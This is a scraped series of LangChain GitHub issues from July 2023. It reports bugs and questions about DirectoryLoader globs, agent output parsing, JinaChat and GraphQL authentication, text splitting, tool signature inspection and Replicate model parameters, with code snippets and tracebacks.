e.g. `DirectoryLoader(path=path, loader_kwargs={"glob": "**/*.xml"})`.
Could this be a bug in how the class is initialized at this line? https://github.com/hwchase17/langchain/blob/master/langchain/document_loaders/directory.py#L33
It seems glob is always set to `"**/[!.]*"` when passed as an argument, but not when it is given inside `loader_kwargs`.
### Who can help?
@eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Make a directory called data
2. Inside that directory store all kinds of supported documents (docx, text, etc.) except -for example- xml files, plus a folder that contains only the xml files
3. Use `loader = DirectoryLoader(path=root_dir + 'data', glob="**/*.xml")`
4. Executing `loader.load()` will not load any documents
Then use `loader = DirectoryLoader(path=path, loader_kwargs={"glob": "**/*.xml"})`
and `loader.load()` will work perfectly.
### Expected behavior
It must work when used like `loader = DirectoryLoader(path=root_dir + 'data', glob="**/*.xml")`.
*NOTE* This happens with all kinds of glob patterns passed through the glob argument. It has nothing to do with the file extension or anything like that.
Let me know if you need more info :) | Glob patterns not finding documents when using it as an argument to DirectoryLoader | https://api.github.com/repos/langchain-ai/langchain/issues/7506/comments | 5 | 2023-07-11T00:04:37Z | 2023-11-09T16:11:45Z | https://github.com/langchain-ai/langchain/issues/7506 | 1,797,824,924 | 7,506 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
It is soooooo **weird** that this repo is still under a personal GitHub account 😕
At this moment in time (1:45pm 7-10-2023)
https://github.com/lang-chain is still available.
It would feel more professional if this repo became an organization.
### Suggestion:
Convert this personal repo to an organizations repo. | MAKE langchain AN ORGANIZATION | https://api.github.com/repos/langchain-ai/langchain/issues/7500/comments | 2 | 2023-07-10T20:46:56Z | 2023-08-17T21:01:34Z | https://github.com/langchain-ai/langchain/issues/7500 | 1,797,559,582 | 7,500 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I keep getting `OutputParserException: Could not parse LLM output`.
I have tried setting handle_parsing_errors=True as well as handle_parsing_errors="Check your output and make sure it conforms!", yet most of the time I still end up with the OutputParserException.
Here is an example of the error:
```
> Entering new chain...
Thought: The question is asking for a detailed explanation of a use example of chain of thought prompting. I should first check if there is a clear answer in the database.
Action: Lookup from database
Action Input: "use example of chain of thought prompting"
Observation: Sure! Here's an example of chain-of-thought prompting:
Let's say we have a language model that needs to solve a math word problem. The problem is: "John has 5 apples. He gives 2 apples to Mary. How many apples does John have now?"
With chain-of-thought prompting, we provide the model with a prompt that consists of triples: input, chain of thought, output. In this case, the prompt could be:
Input: "John has 5 apples. He gives 2 apples to Mary."
Chain of Thought: "To solve this problem, we need to subtract the number of apples John gave to Mary from the total number of apples John had."
Output: "John now has 3 apples."
By providing the model with this chain of thought, we guide it through the reasoning process step-by-step. The model can then generate the correct answer by following the provided chain of thought.
This approach of chain-of-thought prompting helps the language model to decompose multi-step problems into intermediate steps, allowing for better reasoning and problem-solving abilities.
Thought:
---------------------------------------------------------------------------
OutputParserException Traceback (most recent call last)
[<ipython-input-76-951eb95eb01c>](https://localhost:8080/#) in <cell line: 2>()
1 query = "Can you explain a use example of chain of thought prompting in detail?"
----> 2 res = agent_chain(query)
6 frames
[/usr/local/lib/python3.10/dist-packages/langchain/agents/mrkl/output_parser.py](https://localhost:8080/#) in parse(self, text)
40
41 if not re.search(r"Action\s*\d*\s*:[\s]*(.*?)", text, re.DOTALL):
---> 42 raise OutputParserException(
43 f"Could not parse LLM output: `{text}`",
44 observation="Invalid Format: Missing 'Action:' after 'Thought:'",
OutputParserException: Could not parse LLM output: `I have found a clear answer in the database that explains a use example of chain of thought prompting.`
```
Is there any other way in which I can mitigate this problem to get consistent outputs?
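One thing worth checking (an assumption about the setup): `handle_parsing_errors` is an `AgentExecutor` parameter, so setting it on the agent itself or on a chain has no effect. It also accepts a callable, which lets you feed a corrective message back to the model instead of raising — often more reliable than wiring in a separate retry parser. A sketch, with `agent`/`tools`/`memory` standing in for a typical setup:

```python
from langchain.schema import OutputParserException

def handle_error(error: OutputParserException) -> str:
    # Returned text becomes the observation the agent sees on its next step.
    return (
        "Your previous reply could not be parsed. Respond again using exactly:\n"
        "Thought: ...\nAction: <tool name>\nAction Input: ...\n"
        "or, to finish:\nThought: ...\nFinal Answer: ..."
    )

agent_chain = AgentExecutor.from_agent_and_tools(
    agent=agent, tools=tools, verbose=True, memory=memory,
    handle_parsing_errors=handle_error,
)
```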
### Suggestion:
Is there a way to use Retry Parser for this agent, if yes how? | MRKL Agent OutputParser Exception. | https://api.github.com/repos/langchain-ai/langchain/issues/7493/comments | 6 | 2023-07-10T18:46:36Z | 2024-03-21T16:04:42Z | https://github.com/langchain-ai/langchain/issues/7493 | 1,797,326,865 | 7,493 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain-0.0.229
python 3.10
### Who can help?
@delgermurun
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
import os
from langchain.chat_models import JinaChat
from langchain.schema import HumanMessage
os.environ["JINACHAT_API_KEY"] = "..." # from https://cloud.jina.ai/settings/tokens
chat = JinaChat(temperature=0)
messages = [
HumanMessage(
content="Translate this sentence from English to French: I love you!"
)
]
print(chat(messages))
```
### Expected behavior
Expected output: Je t'aime
Actual output:
```python
---------------------------------------------------------------------------
AuthenticationError Traceback (most recent call last)
Cell In[7], line 10
3 chat = JinaChat(temperature=0)
5 messages = [
6 HumanMessage(
7 content="Translate this sentence from English to French: I love generative AI!"
8 )
9 ]
---> 10 chat(messages)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/base.py:349, in BaseChatModel.__call__(self, messages, stop, callbacks, **kwargs)
342 def __call__(
343 self,
344 messages: List[BaseMessage],
(...)
347 **kwargs: Any,
348 ) -> BaseMessage:
--> 349 generation = self.generate(
350 [messages], stop=stop, callbacks=callbacks, **kwargs
351 ).generations[0][0]
352 if isinstance(generation, ChatGeneration):
353 return generation.message
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/base.py:125, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
123 if run_managers:
124 run_managers[i].on_llm_error(e)
--> 125 raise e
126 flattened_outputs = [
127 LLMResult(generations=[res.generations], llm_output=res.llm_output)
128 for res in results
129 ]
130 llm_output = self._combine_llm_outputs([res.llm_output for res in results])
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/base.py:115, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
112 for i, m in enumerate(messages):
113 try:
114 results.append(
--> 115 self._generate_with_cache(
116 m,
117 stop=stop,
118 run_manager=run_managers[i] if run_managers else None,
119 **kwargs,
120 )
121 )
122 except (KeyboardInterrupt, Exception) as e:
123 if run_managers:
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/base.py:262, in BaseChatModel._generate_with_cache(self, messages, stop, run_manager, **kwargs)
258 raise ValueError(
259 "Asked to cache, but no cache found at `langchain.cache`."
260 )
261 if new_arg_supported:
--> 262 return self._generate(
263 messages, stop=stop, run_manager=run_manager, **kwargs
264 )
265 else:
266 return self._generate(messages, stop=stop, **kwargs)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/jinachat.py:288, in JinaChat._generate(self, messages, stop, run_manager, **kwargs)
281 message = _convert_dict_to_message(
282 {
283 "content": inner_completion,
284 "role": role,
285 }
286 )
287 return ChatResult(generations=[ChatGeneration(message=message)])
--> 288 response = self.completion_with_retry(messages=message_dicts, **params)
289 return self._create_chat_result(response)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/jinachat.py:244, in JinaChat.completion_with_retry(self, **kwargs)
240 @retry_decorator
241 def _completion_with_retry(**kwargs: Any) -> Any:
242 return self.client.create(**kwargs)
--> 244 return _completion_with_retry(**kwargs)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/tenacity/__init__.py:289, in BaseRetrying.wraps.<locals>.wrapped_f(*args, **kw)
287 @functools.wraps(f)
288 def wrapped_f(*args: t.Any, **kw: t.Any) -> t.Any:
--> 289 return self(f, *args, **kw)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/tenacity/__init__.py:379, in Retrying.__call__(self, fn, *args, **kwargs)
377 retry_state = RetryCallState(retry_object=self, fn=fn, args=args, kwargs=kwargs)
378 while True:
--> 379 do = self.iter(retry_state=retry_state)
380 if isinstance(do, DoAttempt):
381 try:
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/tenacity/__init__.py:314, in BaseRetrying.iter(self, retry_state)
312 is_explicit_retry = fut.failed and isinstance(fut.exception(), TryAgain)
313 if not (is_explicit_retry or self.retry(retry_state)):
--> 314 return fut.result()
316 if self.after is not None:
317 self.after(retry_state)
File /opt/anaconda3/envs/langchain/lib/python3.10/concurrent/futures/_base.py:451, in Future.result(self, timeout)
449 raise CancelledError()
450 elif self._state == FINISHED:
--> 451 return self.__get_result()
453 self._condition.wait(timeout)
455 if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
File /opt/anaconda3/envs/langchain/lib/python3.10/concurrent/futures/_base.py:403, in Future.__get_result(self)
401 if self._exception:
402 try:
--> 403 raise self._exception
404 finally:
405 # Break a reference cycle with the exception in self._exception
406 self = None
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/tenacity/__init__.py:382, in Retrying.__call__(self, fn, *args, **kwargs)
380 if isinstance(do, DoAttempt):
381 try:
--> 382 result = fn(*args, **kwargs)
383 except BaseException: # noqa: B902
384 retry_state.set_exception(sys.exc_info()) # type: ignore[arg-type]
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/jinachat.py:242, in JinaChat.completion_with_retry.<locals>._completion_with_retry(**kwargs)
240 @retry_decorator
241 def _completion_with_retry(**kwargs: Any) -> Any:
--> 242 return self.client.create(**kwargs)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_resources/chat_completion.py:25, in ChatCompletion.create(cls, *args, **kwargs)
23 while True:
24 try:
---> 25 return super().create(*args, **kwargs)
26 except TryAgain as e:
27 if timeout is not None and time.time() > start + timeout:
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py:153, in EngineAPIResource.create(cls, api_key, api_base, api_type, request_id, api_version, organization, **params)
127 @classmethod
128 def create(
129 cls,
(...)
136 **params,
137 ):
138 (
139 deployment_id,
140 engine,
(...)
150 api_key, api_base, api_type, api_version, organization, **params
151 )
--> 153 response, _, api_key = requestor.request(
154 "post",
155 url,
156 params=params,
157 headers=headers,
158 stream=stream,
159 request_id=request_id,
160 request_timeout=request_timeout,
161 )
163 if stream:
164 # must be an iterator
165 assert not isinstance(response, OpenAIResponse)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_requestor.py:298, in APIRequestor.request(self, method, url, params, headers, files, stream, request_id, request_timeout)
277 def request(
278 self,
279 method,
(...)
286 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
287 ) -> Tuple[Union[OpenAIResponse, Iterator[OpenAIResponse]], bool, str]:
288 result = self.request_raw(
289 method.lower(),
290 url,
(...)
296 request_timeout=request_timeout,
297 )
--> 298 resp, got_stream = self._interpret_response(result, stream)
299 return resp, got_stream, self.api_key
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_requestor.py:700, in APIRequestor._interpret_response(self, result, stream)
692 return (
693 self._interpret_response_line(
694 line, result.status_code, result.headers, stream=True
695 )
696 for line in parse_stream(result.iter_lines())
697 ), True
698 else:
699 return (
--> 700 self._interpret_response_line(
701 result.content.decode("utf-8"),
702 result.status_code,
703 result.headers,
704 stream=False,
705 ),
706 False,
707 )
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_requestor.py:763, in APIRequestor._interpret_response_line(self, rbody, rcode, rheaders, stream)
761 stream_error = stream and "error" in resp.data
762 if stream_error or not 200 <= rcode < 300:
--> 763 raise self.handle_error_response(
764 rbody, rcode, resp.data, rheaders, stream_error=stream_error
765 )
766 return resp
AuthenticationError: Invalid token
``` | JinaChat Authentication | https://api.github.com/repos/langchain-ai/langchain/issues/7490/comments | 9 | 2023-07-10T18:15:56Z | 2023-11-21T15:23:24Z | https://github.com/langchain-ai/langchain/issues/7490 | 1,797,274,034 | 7,490 |
[
"hwchase17",
"langchain"
]
| ### Discussed in https://github.com/hwchase17/langchain/discussions/7423
<div type='discussions-op-text'>
<sup>Originally posted by **aju22** July 9, 2023</sup>
Here is the code I'm using for initializing a Zero Shot ReAct Agent with some tools for fetching relevant documents from a vector database:
```
chat_model = ChatOpenAI(
    model_name="gpt-3.5-turbo",
    temperature=0,
    openai_api_key=openai_api_key,
    streaming=True,
    # verbose=True,
)
llm_chain = LLMChain(llm=chat_model, prompt=prompt)
agent = ZeroShotAgent(llm_chain=llm_chain, tools=tools, verbose=True, handle_parsing_errors=True)
agent_chain = AgentExecutor.from_agent_and_tools(
agent=agent, tools=tools, verbose=True, memory=memory
)
```
However, when I query for a response:
```
query = "Can you explain a use case example of chain of thought prompting in detail?"
res = agent_chain(query)
```
This is the response I get back:
```
> Entering new chain...
Thought: The question is asking for a detailed explanation of a use example of chain-of-thought prompting.
Action: Lookup from database
Action Input: "use example of chain-of-thought prompting"
Observation: Sure! Here's an example of chain-of-thought prompting:
Let's say we have a language model that is trained to solve math word problems. We want to use chain-of-thought prompting to improve its reasoning abilities.
The prompt consists of triples: input, chain of thought, output. For example:
Input: "John has 5 apples."
Chain of Thought: "If John gives 2 apples to Mary, how many apples does John have left?"
Output: "John has 3 apples left."
In this example, the chain of thought is a series of intermediate reasoning steps that lead to the final output. It helps the language model understand the problem and perform the necessary calculations.
By providing these chain-of-thought exemplars during training, the language model learns to reason step-by-step and can generate similar chains of thought when faced with similar problems during inference.
This approach of chain-of-thought prompting has been shown to improve the performance of language models on various reasoning tasks, including arithmetic, commonsense, and symbolic reasoning. It allows the models to decompose complex problems into manageable steps and allocate additional computation when needed.
Overall, chain-of-thought prompting enhances the reasoning abilities of large language models and helps them achieve state-of-the-art performance on challenging tasks.
Thought:I have provided a detailed explanation and example of chain-of-thought prompting.
Final Answer: Chain-of-thought prompting is a method used to improve the reasoning abilities of large language models by providing demonstrations of chain-of-thought reasoning as exemplars in prompting. It involves breaking down multi-step problems into manageable intermediate steps, leading to more effective reasoning and problem-solving. An example of chain-of-thought prompting is providing a language model with a math word problem prompt consisting of an input, chain of thought, and output. By training the model with these exemplars, it learns to reason step-by-step and can generate similar chains of thought when faced with similar problems during inference. This approach has been shown to enhance the performance of language models on various reasoning tasks.
> Finished chain.
```
As you can observe, the model has a very thorough and exact answer in its observation. However, in the next thought the model decides it is done providing a detailed explanation and example, so the final answer is just some basic information that doesn't really answer the question in the necessary detail.
I feel like somewhere in the intermediate steps the agent thinks it has already answered the human, and hence doesn't bother to give that content as the final answer.
Can someone please help me figure out how I can make the model output its observation as the final answer, or stop the model from assuming it has already answered the question? (A workaround sketch follows.)
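One workaround sketch that side-steps the prompt entirely (an assumption, not a confirmed fix): have the executor return its intermediate steps and read the last observation directly:

```python
agent_chain = AgentExecutor.from_agent_and_tools(
    agent=agent, tools=tools, verbose=True,
    memory=memory,  # may need ConversationBufferMemory(..., output_key="output")
    return_intermediate_steps=True,
)
res = agent_chain({"input": query})
observation = res["intermediate_steps"][-1][1]  # last (action, observation) pair
```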
Will playing around with the prompt template work? </div> | Langchain MRKL Agent not giving useful Final Answer | https://api.github.com/repos/langchain-ai/langchain/issues/7489/comments | 4 | 2023-07-10T17:35:37Z | 2023-08-07T08:28:23Z | https://github.com/langchain-ai/langchain/issues/7489 | 1,797,221,278 | 7,489 |
[
"hwchase17",
"langchain"
]
| ### System Info
When running the following code:
```
from langchain import OpenAI
from langchain.agents import load_tools, initialize_agent, AgentType
from langchain.utilities import GraphQLAPIWrapper
from langchain.memory import ConversationBufferMemory
llm = OpenAI(temperature=0, openai_api_key=openai_api_key)
token = "..."
tools = load_tools(
["graphql"],
custom_headers={"Authorization": token, "Content-Type": "application/json"},
graphql_endpoint="...",
llm=llm
)
memory = ConversationBufferMemory(memory_key="chat_history")
agent = initialize_agent(
tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION, verbose=True, memory=memory
)
graphql_fields = """query getCompanies {get_companies}"""
suffix = "Call the API with schema "
agent.run(f"{suffix} {graphql_fields}")
```
I'm getting the error:
```
TransportQueryError: Error while fetching schema: {'errorType': 'UnauthorizedException', 'message': 'You are not authorized to make this call.'}
If you don't need the schema, you can try with: "fetch_schema_from_transport=False"
```
It doesn't matter what value is provided under custom_headers, or if it is passed as a parameter at all. The error is always the same. Playground code from https://python.langchain.com/docs/modules/agents/tools/integrations/graphql worked as intended.
Any idea of what the problem is?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain import OpenAI
from langchain.agents import load_tools, initialize_agent, AgentType
from langchain.utilities import GraphQLAPIWrapper
from langchain.memory import ConversationBufferMemory
llm = OpenAI(temperature=0, openai_api_key=openai_api_key)
token = "..."
tools = load_tools(
["graphql"],
custom_headers={"Authorization": token, "Content-Type": "application/json"},
graphql_endpoint="...",
llm=llm
)
memory = ConversationBufferMemory(memory_key="chat_history")
agent = initialize_agent(
tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION, verbose=True, memory=memory
)
graphql_fields = """query getCompanies {get_companies}"""
suffix = "Call the API with schema "
agent.run(f"{suffix} {graphql_fields}")
TransportQueryError: Error while fetching schema: {'errorType': 'UnauthorizedException', 'message': 'You are not authorized to make this call.'}
If you don't need the schema, you can try with: "fetch_schema_from_transport=False"
```
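To check whether the headers themselves are the problem, the endpoint can be queried directly with `gql`, skipping schema fetching (a sketch; the endpoint URL is elided as in the report):

```python
from gql import Client, gql
from gql.transport.requests import RequestsHTTPTransport

transport = RequestsHTTPTransport(
    url="...",  # same GraphQL endpoint
    headers={"Authorization": token, "Content-Type": "application/json"},
)
client = Client(transport=transport, fetch_schema_from_transport=False)
result = client.execute(gql("query getCompanies { get_companies }"))
```

If this succeeds, the wrapper is fetching the schema without the custom headers; if it fails the same way, the token/headers are the issue.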
### Expected behavior
An allowed API call that doesn't cause authentication issues | TransportQueryError when using GraphQL tool | https://api.github.com/repos/langchain-ai/langchain/issues/7488/comments | 5 | 2023-07-10T17:26:29Z | 2023-12-08T16:06:25Z | https://github.com/langchain-ai/langchain/issues/7488 | 1,797,208,894 | 7,488 |
[
"hwchase17",
"langchain"
]
| ### System Info
After v0.0.226, the RecursiveCharacterTextSplitter seems to no longer separate properly at the end of sentences and now cuts many sentences mid-word.
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
splitter = RecursiveCharacterTextSplitter(
chunk_size=450,
chunk_overlap=20,
length_function=len,
#separators=["\n\n", "\n", ".", " ", ""], # tried with and without this
)
```
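A minimal way to see the behavior on a small sample (the text here is arbitrary):
```python
sample = "First sentence here. Second sentence follows.\nA new line starts here. " * 10
for chunk in splitter.split_text(sample):
    print(repr(chunk[-30:]))  # chunk tails end mid-word instead of at "\n" or "."
```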
### Expected behavior
Would like to split at newlines or period marks. | RecursiveCharacterTextSplitter strange behavior after v0.0.226 | https://api.github.com/repos/langchain-ai/langchain/issues/7485/comments | 16 | 2023-07-10T16:21:55Z | 2024-05-16T16:06:44Z | https://github.com/langchain-ai/langchain/issues/7485 | 1,797,105,833 | 7,485 |
[
"hwchase17",
"langchain"
]
| ### System Info
master
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Signature inspection for callbacks fails on tools whose `func` is a chain that does not define `_chain_type`.
Signature inspection ends up calling `__eq__`, which for pydantic objects calls `dict()`, which in turn raises `NotImplementedError` by default.
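A minimal sketch of what I believe is happening (plain pydantic v1, no LangChain): `inspect.signature` tests `obj in (type, object)`, which routes through pydantic's `__eq__` and therefore through `dict()`:
```python
import inspect
from pydantic import BaseModel

class ChainLike(BaseModel):
    def dict(self, **kwargs):  # mimics Chain.dict() -> _chain_type raising
        raise NotImplementedError("Saving not supported for this chain type.")

    def __call__(self, q: str) -> str:
        return q

inspect.signature(ChainLike())  # raises NotImplementedError instead of returning a Signature
```
An interim workaround seems to be wrapping the chain in a plain function before handing it to `Tool(func=...)`, so that `signature()` inspects an ordinary function. The full failure as observed: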
```
> Entering new chain...
I need to find the product with the highest revenue
Action: Dataframe analysis
Action Input: the dataframe containing product and revenue information
---------------------------------------------------------------------------
NotImplementedError Traceback (most recent call last)
Cell In[24], line 1
----> 1 agent.run('which product has the highest revenue?')
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:290, in Chain.run(self, callbacks, tags, *args, **kwargs)
288 if len(args) != 1:
289 raise ValueError("`run` supports only one positional argument.")
--> 290 return self(args[0], callbacks=callbacks, tags=tags)[_output_key]
292 if kwargs and not args:
293 return self(kwargs, callbacks=callbacks, tags=tags)[_output_key]
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:166, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, include_run_info)
164 except (KeyboardInterrupt, Exception) as e:
165 run_manager.on_chain_error(e)
--> 166 raise e
167 run_manager.on_chain_end(outputs)
168 final_outputs: Dict[str, Any] = self.prep_outputs(
169 inputs, outputs, return_only_outputs
170 )
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:160, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, include_run_info)
154 run_manager = callback_manager.on_chain_start(
155 dumpd(self),
156 inputs,
157 )
158 try:
159 outputs = (
--> 160 self._call(inputs, run_manager=run_manager)
161 if new_arg_supported
162 else self._call(inputs)
163 )
164 except (KeyboardInterrupt, Exception) as e:
165 run_manager.on_chain_error(e)
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/agents/agent.py:987, in AgentExecutor._call(self, inputs, run_manager)
985 # We now enter the agent loop (until it returns something).
986 while self._should_continue(iterations, time_elapsed):
--> 987 next_step_output = self._take_next_step(
988 name_to_tool_map,
989 color_mapping,
990 inputs,
991 intermediate_steps,
992 run_manager=run_manager,
993 )
994 if isinstance(next_step_output, AgentFinish):
995 return self._return(
996 next_step_output, intermediate_steps, run_manager=run_manager
997 )
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/agents/agent.py:850, in AgentExecutor._take_next_step(self, name_to_tool_map, color_mapping, inputs, intermediate_steps, run_manager)
848 tool_run_kwargs["llm_prefix"] = ""
849 # We then call the tool on the tool input to get an observation
--> 850 observation = tool.run(
851 agent_action.tool_input,
852 verbose=self.verbose,
853 color=color,
854 callbacks=run_manager.get_child() if run_manager else None,
855 **tool_run_kwargs,
856 )
857 else:
858 tool_run_kwargs = self.agent.tool_run_logging_kwargs()
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/tools/base.py:299, in BaseTool.run(self, tool_input, verbose, start_color, color, callbacks, **kwargs)
297 except (Exception, KeyboardInterrupt) as e:
298 run_manager.on_tool_error(e)
--> 299 raise e
300 else:
301 run_manager.on_tool_end(
302 str(observation), color=color, name=self.name, **kwargs
303 )
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/tools/base.py:271, in BaseTool.run(self, tool_input, verbose, start_color, color, callbacks, **kwargs)
268 try:
269 tool_args, tool_kwargs = self._to_args_and_kwargs(parsed_input)
270 observation = (
--> 271 self._run(*tool_args, run_manager=run_manager, **tool_kwargs)
272 if new_arg_supported
273 else self._run(*tool_args, **tool_kwargs)
274 )
275 except ToolException as e:
276 if not self.handle_tool_error:
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/tools/base.py:412, in Tool._run(self, run_manager, *args, **kwargs)
405 def _run(
406 self,
407 *args: Any,
408 run_manager: Optional[CallbackManagerForToolRun] = None,
409 **kwargs: Any,
410 ) -> Any:
411 """Use the tool."""
--> 412 new_argument_supported = signature(self.func).parameters.get("callbacks")
413 return (
414 self.func(
415 *args,
(...)
420 else self.func(*args, **kwargs)
421 )
File ~/opt/anaconda3/envs/langchain/lib/python3.9/inspect.py:3113, in signature(obj, follow_wrapped)
3111 def signature(obj, *, follow_wrapped=True):
3112 """Get a signature object for the passed callable."""
-> 3113 return Signature.from_callable(obj, follow_wrapped=follow_wrapped)
File ~/opt/anaconda3/envs/langchain/lib/python3.9/inspect.py:2862, in Signature.from_callable(cls, obj, follow_wrapped)
2859 @classmethod
2860 def from_callable(cls, obj, *, follow_wrapped=True):
2861 """Constructs Signature for the given callable object."""
-> 2862 return _signature_from_callable(obj, sigcls=cls,
2863 follow_wrapper_chains=follow_wrapped)
File ~/opt/anaconda3/envs/langchain/lib/python3.9/inspect.py:2328, in _signature_from_callable(obj, follow_wrapper_chains, skip_bound_arg, sigcls)
2322 if isfunction(obj) or _signature_is_functionlike(obj):
2323 # If it's a pure Python function, or an object that is duck type
2324 # of a Python function (Cython functions, for instance), then:
2325 return _signature_from_function(sigcls, obj,
2326 skip_bound_arg=skip_bound_arg)
-> 2328 if _signature_is_builtin(obj):
2329 return _signature_from_builtin(sigcls, obj,
2330 skip_bound_arg=skip_bound_arg)
2332 if isinstance(obj, functools.partial):
File ~/opt/anaconda3/envs/langchain/lib/python3.9/inspect.py:1875, in _signature_is_builtin(obj)
1866 def _signature_is_builtin(obj):
1867 """Private helper to test if `obj` is a callable that might
1868 support Argument Clinic's __text_signature__ protocol.
1869 """
1870 return (isbuiltin(obj) or
1871 ismethoddescriptor(obj) or
1872 isinstance(obj, _NonUserDefinedCallables) or
1873 # Can't test 'isinstance(type)' here, as it would
1874 # also be True for regular python classes
-> 1875 obj in (type, object))
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/pydantic/main.py:911, in pydantic.main.BaseModel.__eq__()
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:342, in Chain.dict(self, **kwargs)
340 raise ValueError("Saving of memory is not yet supported.")
341 _dict = super().dict()
--> 342 _dict["_type"] = self._chain_type
343 return _dict
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:65, in Chain._chain_type(self)
63 @property
64 def _chain_type(self) -> str:
---> 65 raise NotImplementedError("Saving not supported for this chain type.")
NotImplementedError: Saving not supported for this chain type.
```
### Expected behavior
chains with unimplemented chain_type should still work | tool signature inspection for callbacks fails on certain chains | https://api.github.com/repos/langchain-ai/langchain/issues/7484/comments | 3 | 2023-07-10T16:18:29Z | 2023-10-16T16:05:14Z | https://github.com/langchain-ai/langchain/issues/7484 | 1,797,099,248 | 7,484 |
[
"hwchase17",
"langchain"
]
| ### System Info
Windows.
### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [x] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Hello, I am trying to use LangChain with replicate-python:
https://github.com/replicate/replicate-python
However, I am confused about how to modify max_new_tokens (max_length) for the LLM.
To be specific, this is a small part of my code:
```
#main.py
llm = Replicate(
model="joehoover/falcon-40b-instruct:xxxxxxxx",
model_kwargs={ "max_length":1000},
input= { "max_length":1000})
```
I put max_length everywhere and still it isn't reflected.
According to the docs in
https://github.com/hwchase17/langchain/blob/master/langchain/llms/replicate.py
you just need to add the following:
```
from langchain.llms import Replicate
replicate = Replicate(model="stability-ai/stable-diffusion: \
27b93a2413e7f36cd83da926f365628\
0b2931564ff050bf9575f1fdf9bcd7478",
input={"image_dimensions": "512x512"})
```
However, this method is both outdated and not working.
Here is the rest of my code; it is nearly identical to this file:
